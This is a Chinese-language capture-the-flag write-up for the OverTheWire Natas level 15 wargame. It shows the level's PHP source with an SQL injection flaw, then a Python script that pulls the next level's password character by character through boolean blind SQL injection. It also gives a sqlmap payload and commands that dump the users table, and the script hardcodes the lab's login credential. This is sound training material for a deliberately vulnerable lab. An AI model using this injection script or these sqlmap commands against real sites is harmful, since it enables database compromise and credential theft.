我们打开lv15,查看信息
可以看到有一个查询框
试一试natas15
结果显示用户不存在
我们查看源码
源码如下
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas15', '<censored>');
mysqli_select_db($link, 'natas15');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysqli_query($link, $query);
if($res) {
if(mysqli_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysqli_close($link);
} else {
?>
我们大概分析下源码的作用
1、查询是否存在用户
2、前端显示错误
大神的脚本
import requests
from requests.auth import HTTPBasicAuth
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
filtered = ''
passwd = ''
for char in chars:
Data = {'username' : 'natas16" and password LIKE BINARY "%' + char + '%" #'}
r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
if 'exists' in r.text :
filtered = filtered + char
for i in range(0,32):
for char in filtered:
Data = {'username' : 'natas16" and password LIKE BINARY "' + passwd + char + '%" #'}
r = requests.post('http://natas15.natas.labs.overthewire.org/index.php?debug', auth=HTTPBasicAuth('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), data = Data)
if 'exists' in r.text :
passwd = passwd + char
print(passwd)
break
我们修改下。在vs中跑
等待结果
记录密码
验证密码
我们换一种思路
使用sqlmap进行盲注
使用的payload为
index.php?debug=1&username=1" or 1 -- +
然后进行抓包保存
打开sqlmap进行盲注
python sqlmap.py -r natas16.txt --random-agent --dbms=mysql --level=3 -p username --dump
python sqlmap.py -r natas16.txt --random-agent -p username -D natas15 -T users -C username,password --dump
等待结果
超时了,多试几次